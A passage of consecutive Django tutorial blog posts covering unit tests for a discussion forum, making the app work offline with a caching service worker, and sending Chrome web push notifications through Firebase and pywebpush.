The setUp is run before and after every test respectively. This allows you to set up a basic context or environment inside of each of your tests. This also ensures that each of your tests does not edit the data that other tests depend on. This is a basic tenet of testing, that each test should stand alone, and not affect the others. This code snippet when ran creates the respective users for User objects and a Post object. We are going to use these as the base for meaningful tests that we will write in a bit.
If at this stage we run the command: python manage.py test discussions we’ll get the result something like this:

Creating test database for alias 'default'...
----------------------------------------------------------------------
Ran 0 tests in 0.000s
OK
Destroying test database for alias 'default'...

Now, this is self-explanatory that no tests ran since we didn’t have any assertions in our tests right now. Before writing some of our tests we should also know about the test database that’s been created when we run our tests.
Tests that require a database (namely, model tests) will not use your “real” (production) database. Separate, blank databases are created for the tests.
Regardless of whether the tests pass or fail, the test databases are destroyed when all the tests have been executed.
You can prevent the test databases from being destroyed by using the test –keepdb option. This will preserve the test database between runs. If the database does not exist, it will first be created. Any migrations will also be applied in order to keep it up to date.

def test_double_voting(self):
        post = self.new_discussion(self.ramesh, "Ramesh's Biography")
        self.assertEquals(post.upvotes, 0)
        post.upvote(self.amit)
        post = Post.objects.get(pk=post.id)
        self.assertEquals(post.upvotes, 1)
        post.upvote(self.amit)
        post = Post.objects.get(pk=post.id)
        self.assertEquals(post.upvotes, 1)
def test_comments_ordering(self):
        _c1 = "See my Biography!"
        _c2 = "Dude, this is terrible!"
        _c3 = "Why write your biography when you haven't achieved a thing!"
        _c4 = "Seriously, that's all you have to say?"
        post = self.new_discussion(self.ramesh, "Ramesh's Biography")
        self.assertEquals(post.num_comments, 0)
        rameshs_comment = post.add_comment(_c1, self.ramesh)
        amits_comment = rameshs_comment.reply(_c2, self.amit)
        swethas_comment = rameshs_comment.reply(_c3, self.swetha)
        rameshs_response = amits_comment.reply(_c4, self.ramesh)
        comments = [c.text for c in
                    Comment.objects.best_ones_first(post.id, self.ramesh.id)]
        self.assertEquals(comments, [_c1, _c2, _c4, _c3])
        # check if num_comments in post object is updated
        post = Post.objects.get(pk=post.id)
        self.assertEquals(post.num_comments, 4)

As we discussed above, we need to determine the apt scenarios which should be handled with test cases in order to maintain quality assurance. So the above snippet demonstrates a couple of scenarios for which we wrote test cases for our discussion forum. The tests are enough self-explanatory, wherein the first one we check if there is no double voting done by a particular user. The test consists of first starting of a new discussion and then a series of upvotes and assertions checking if the result is as we expected it to be. Whereas, in the second example we are assuring the correct order and count of the comments that are being added to a discussion.
On running tests now, the result is:

Creating test database for alias 'default'...
..
----------------------------------------------------------------------
Ran 2 tests in 0.532s
OK
Destroying test database for alias 'default'...

Both of our tests passed and the test database created was destroyed.

Summary

Unit tests lay a solid foundation on which the rest of your testing process should be built. Opening your app up and taking the new feature you just developed for a test drive is always a good practice. So I think we can come down to mainly 3 reasons why unit testing our app can be a boon for us:

  1. Knowing if our code really works.
  2. It saves us a lot of pain (and time).
  3. It makes deployments a snap.

Happy unit testing folks!

With, Progressive Web Applications (PWAs), developers can deliver amazing app-like experiences to users using modern web technologies. It is an emerging technology designed to deliver functionalities like push notifications, working offline etc to deliver a rich mobile experience.In this post, we will learn how to make your Django application progressive that works offline.

 

What are progressive web applications?

Progressive web applications are web applications with the rich user experience. They make smooth user interaction with web and have the following features :

A force that drives progressive web applications

The core concept behind progressive web app is service worker. Service worker is a script which browser runs in the background without interfering with the user’s interaction with the application. Some of the work done by this script include push notification, content caching, data synch when the internet connection is available.

 

There are a lot more about progressive web applications. But in this post, we are more concerned with connectivity independent feature. We will learn how service workers help us to get the things done. This post is going to be about making a Django application work offline. We will use charcha as our reference application.

Let’s get started without any further delay.

 

Register a service worker

To bring service worker in the loop, we need to register it in our application. Basically, it tells the browser where it needs to look for the service worker script. Put the following code snippet in your javascript file, it gets loaded as soon as your application runs.

 

 

 var serviceWorkerPath = "/charcha-serviceworker.js";
 var charchaServiceWorker = registerServiceWorker(serviceWorkerPath);
 function registerServiceWorker(serviceWorkerPath){
    if('serviceWorker' in navigator){
      navigator.serviceWorker
        .register(serviceWorkerPath)
          .then(
            function(reg){
              console.log('charcha service worker registered');
            }
          ).catch(function(error){
            console.log(error)
          });
    }
 }

 

How does the above code work?

Launching your Django application

Now go ahead and launch your Django application. Open the browser console and if you are able to see the above-mentioned error, that means you should be grateful to your browser for having service worker support. Okay! that being said, we encountered this error, which means something is wrong. Reload your application and you will see a detailed error message as mentioned below

service worker registration failure

This is because Django could not find anything to render for request /charcha-serviceworker.js.
Our next step is to define a URL path and call a view for this path.

 

  url(r'^charcha-serviceworker(.*.js)$', views.charcha_serviceworker, name='charcha_serviceworker'),
 def charcha_serviceworker(request, js):
      template = get_template('charcha-serviceworker.js')
      html = template.render()
      return HttpResponse(html, content_type="application/x-javascript")

what we are doing above is, just returning our Charcha-serviceworker.js whenever a request is made to download this file.

 

TEMPLATES = [
    {
        ...
        'DIRS': [os.path.join(PROJECT_ROOT, 'templates'), os.path.join(PROJECT_ROOT, ' '),],
        ...
        ...
    },
]

Notice os.path.join(PROJECT_ROOT, 'templates') was existing template path and os.path.join(PROJECT_ROOT, ' ') was added and hence enabling get_template function to search for script file in the project root directory.

 

Now re run your application and if you do not see the previous error, that means you are good to go with writing service worker script.

 

 

Install the service worker

When a service worker is registered, an install event is triggered the very first time an user visits the application page. This is the place where we cache all the resources needed for our application to work offline.
Open the previously created charcha-serviceworker.js and define a callback function which listens for install event.

var cacheName = 'charcha';
var filesToCache = [
'/',
];
self.addEventListener('install', function(event) {
  event.waitUntil(
    caches.open(cacheName).then(function(cache) {
      return cache.addAll(filesToCache);
    })
  );
});

Let us see what’s going on here

  1. It adds an eventListener which listens for the install event.
  2. Opens a cache with the name charcha.
  3. Adds an array of files which need to be cached and pass it to cache.addAll() function.
  4. event.waitUntil waits untill the caching promise is resolved or rejected.
  5. Service worker is considered successfully installed only when it caches all the files successfully. If it fails to download and cache even a single file, the installation fails and browser throws away this service worker.

Install occurs only once per service worker unless you update and modify the script. In that case, a fresh new service worker will be created without altering the existing running one. We will discuss it more in a later phase which is update phase of a service worker.

 

Rerun your application and open chrome dev tools. Open Service Workers pane in the Application panel. You will find your service worker with running status. It will show something like below to make sure that the service worker is successfully installed.

service worker installed

You will see a list of cached file in Cache Storage pane under Cache in same Application panel.

NOTE : We can add all the static resources like css files, image files in the list of files to be cached. But dynamic url like /discuss/{post_id} cannot be defined in this list. So how to cache wildcard urls. We will see it in the next section.

 

Intercept the request and return cached resources

Since we have installed our service worker , we are ready to roll and return responses from our cached resources. Once the service worker is installed, every new request triggers a ‘fetch’ event. We can write a function which listen for this event and responds with the cached version of the requested resource. Our fetch event listener is going to look like

self.addEventListener('fetch', function(event) {
  event.respondWith(
    caches.match(event.request).then(function(response) {
      return response || fetch(event.request);
    })
  );
});

Through the above code snippet, we are trying to fetch the requested resource from the list of cached reources. If it finds, the resource is returned from the cache, otherwise, we make a network request to fetch the resource and return it.

 

In the previous section, we saw an issue of caching dynamic urls. Let’s see how we can resolve that inside fetchevent listener. Modify the previous code for fetch event to look like

self.addEventListener('fetch', function(event) {
  event.respondWith(
    caches.match(event.request)
      .then(function(response) {
        if (response) {
          return response;
        }
        var fetchRequest = event.request.clone();
        return fetch(fetchRequest).then(
          function(response) {
            if(!response || response.status !== 200 || response.type !== 'basic') {
              return response;
            }
            var responseToCache = response.clone();
            caches.open(cacheName)
              .then(function(cache) {
                cache.put(event.request, responseToCache);
              });
            return response;
          }
        );
      })
    );
});

Let’s walk through the code to see how it solves the aforementioned issue.

 

How the code solves the aforementioned issue

  1. Only if the requested resource is available in the cache, a cache hit occurs and resource is returned from cache.
  2. In case the cache hit does not occur with the requested resource (which will be the case with dynamic urls), a fresh fetch request is made to fetch the resource from the network.
  3. If the response is not valid, status is not 200 or response type is not basic, the response is returned because error responses need not to be cached.
  4. In case the response is valid, status is 200 and response type is basic, this response is first saved into a cached list and then returned to the client.

You might wonder why are we clonning request and response. Basically, a web request/response is a stream. It can be consumed by only one. In our code, we are consuming request/response for both caching and calling a fetch event. Once read, the stream is gone and will not be available for next read. In order to get a fresh request/response stream again, we clone the request/response.

 

Now with the above fetch event listener, we are sure that each and every new requested resource is cached and returned when a request is made.
At this stage, we are good to go and test the offline running capability of our application. To test it follow these steps:

 

  1. Rerun the application and browse through a few pages.
  2. Open chrome dev tools and open Service Workers pane in Application panel.
  3. Enable offline check box. After enabling it, you will see a yellow warning icon. This indicates that your application has gone offline.
  4. Now go and browse through all those pages which you previously visited and were cached. You will be able to access those pages without any network error.

 

Activate the service worker

service worker waiting
self.addEventListener('activate', function(e) {
  e.waitUntil(
    caches.keys().then(function(keyList) {
      return Promise.all(keyList.map(function(key) {
        if (key !== cacheName) {
          return caches.delete(key);
        }
      }));
    })
  );
});

Now you can Go Gaga over it because you have managed to make your django application work offline.

 

Summary

You can make Django web apps work faster, more engaging and also work offline. You just need to have support for sevice worker’s in your target browser.

There is more of a progressive web app and service worker. Hang around because in further posts we will discuss

 

This is the fourth post in the Django Blog Series. In this post, we will go through the implementation of web push notifications for Google Chrome in Django. This post is inspired from the push notifications of Charcha Discussion Forum. You can find the full code for the Charcha forum here.

Web Push Notifications require a service worker to run in the browser through which push notification can be sent. It sends the notification through Firebase Cloud Messaging, enabling applications to interact with the users even while not using the application.

Registering Application on Firebase

To send Web Push Notification to the client, you need to register your application on Firebase Console.

Setting up Service Worker

// Register event listener for the 'push' event.
self.addEventListener('push', function(event) {
 payload = event.data.text();
 // Keep the service worker alive until the notification is created.
 event.waitUntil(
   // Show a notification with title and use the payload
   // as the body.
   self.registration.showNotification(payload.title, payload.options)
 );
});
// Event Listener for notification click
self.addEventListener('notificationclick', function(event) {
 event.notification.close();
 event.waitUntil(
   clients.openWindow(<URL>)
 );
});

 

Subscribing or Unsubscribing Users

Create a javascript file which contains the code for subscribing to push notification, adding service worker, asking the user for notification permission and storing the endpoint in the database.

Define the following variables:

var serviceWorkerSrc = "/static/serviceworker.js";
var callhome = function(status) {
  console.log(status);
}
var storage = window.localStorage;
var registration;

Define onPageLoad() which will check and register the service worker. On successful registration of service worker it will call initialiseState() which is defined in the next step.

 function onPageLoad() {
   // Do everything if the Browser Supports Service Worker
   if ('serviceWorker' in navigator) {
     navigator.serviceWorker.register(serviceWorkerSrc)
       .then(
         function(reg) {
           registration = reg;
           initialiseState(reg);
         }
       );
   }
   // If service worker not supported, show warning to the message box
   else {
     callhome("service-worker-not-supported");
   }
 }

 

Define initialiseState() which will check whether notifications are supported by the browser or not. If notifications are supported it will call the subscribe() which is defined in the next step.

 // Once the service worker is registered set the initial state
 function initialiseState(reg) {
   // Are Notifications supported in the service worker?
   if (!(reg.showNotification)) {
     callhome("showing-notifications-not-supported-in-browser");
     return;
   }
   // Check the current Notification permission.
   // If its denied, it's a permanent block until the
   // user changes the permission
   if (Notification.permission === 'denied') {
     callhome("notifications-disabled-by-user");
     return;
   }
   // Check if push messaging is supported
   if (!('PushManager' in window)) {
     // Show a message and activate the button
     console.log('push-notifications-not-supported-in-browser');
     return;
   }
   subscribe();
 }

 

Define subscribe() which tries to subscribe the user to push notification. If subscription does not exist, it will ask the user for notification permission. Once notification permission is granted, it will receive the subscription details which will be sent to postSubscribeObj() for processing.

If the user has already subscribed the same subscription details will be returned.

 function subscribe() {
   registration.pushManager.getSubscription().then(
       function(existing_subscription) {
         // Check if Subscription is available
         if (existing_subscription) {
           endpoint = existing_subscription.toJSON()['endpoint']
           if (storage.getItem(endpoint) === 'failed') {
             postSubscribeObj('subscribe', existing_subscription);
           }
           return existing_subscription;
         }
         // If not, register one using the
         // registration object we got when
         // we registered the service worker
         registration.pushManager.subscribe({
           userVisibleOnly: true
         }).then(
           function(new_subscription) {
             postSubscribeObj('subscribe', new_subscription);
           }
         );
       }
     )
 }

Define unsubscribe() which will unsubscribe the user from the push notification by deleting the endpoint from the database.

It will get the subscription details from the pushManager and send it to postSubscribeObj() to update the subscription status on the server.

 function unsubscribe() {
   navigator.serviceWorker.ready.then(function(existing_reg) {
     // Get the Subscription to unregister
     registration.pushManager.getSubscription()
       .then(
         function(subscription) {
           // Check we have a subscription to unsubscribe
           if (!subscription) {
             return;
           }
           postSubscribeObj('unsubscribe', subscription);
         }
       )
   });
 }

Define postSubscribeObj() which updates the endpoint on the server by making an API call.

 function postSubscribeObj(statusType, subscription) {
   // Send the information to the server with fetch API.
   // the type of the request, the name of the user subscribing,
   // and the push subscription endpoint + key the server needs
   // to send push messages
   var subscription = subscription.toJSON();
   // API call to store the endpoint in the database
 }

Call onPageLoad() to initialize the worker status check and update subscription.

 onPageLoad();

Sending Web Push Notification

On successful subscription, an endpoint will be stored which can be used to send a notification to the user. For python, Pywebpush package can be used to send web push notification.

The subscription JSON will be received on successful subscription.
GCM_KEY - The server key from the Firebase console
ttl - Time to Live (Integer)

Prerequisite

Pywebpush dependency
Explicity add pyelliptic==1.5.7 in requirements file as newer version has some issues.
from pywebpush import WebPusher
subscription = {
   "endpoint": endpoint,
   "keys": {
       "auth": auth,
       "p256dh": p256dh
   }
}
payload = {
   "title": title,
   "options": options or {}
}
WebPusher(subscription).\
   send(json.dumps(payload), {}, ttl, GCM_KEY)

Summary

In this blog, you learned the implementation of web push notifications for Google Chrome in Django. This is how you can set up Web Push Notifications for Chrome.
Push Libraries- https://github.com/web-push-libs/

PHP Code Snippets Powered By : XYZScripts.com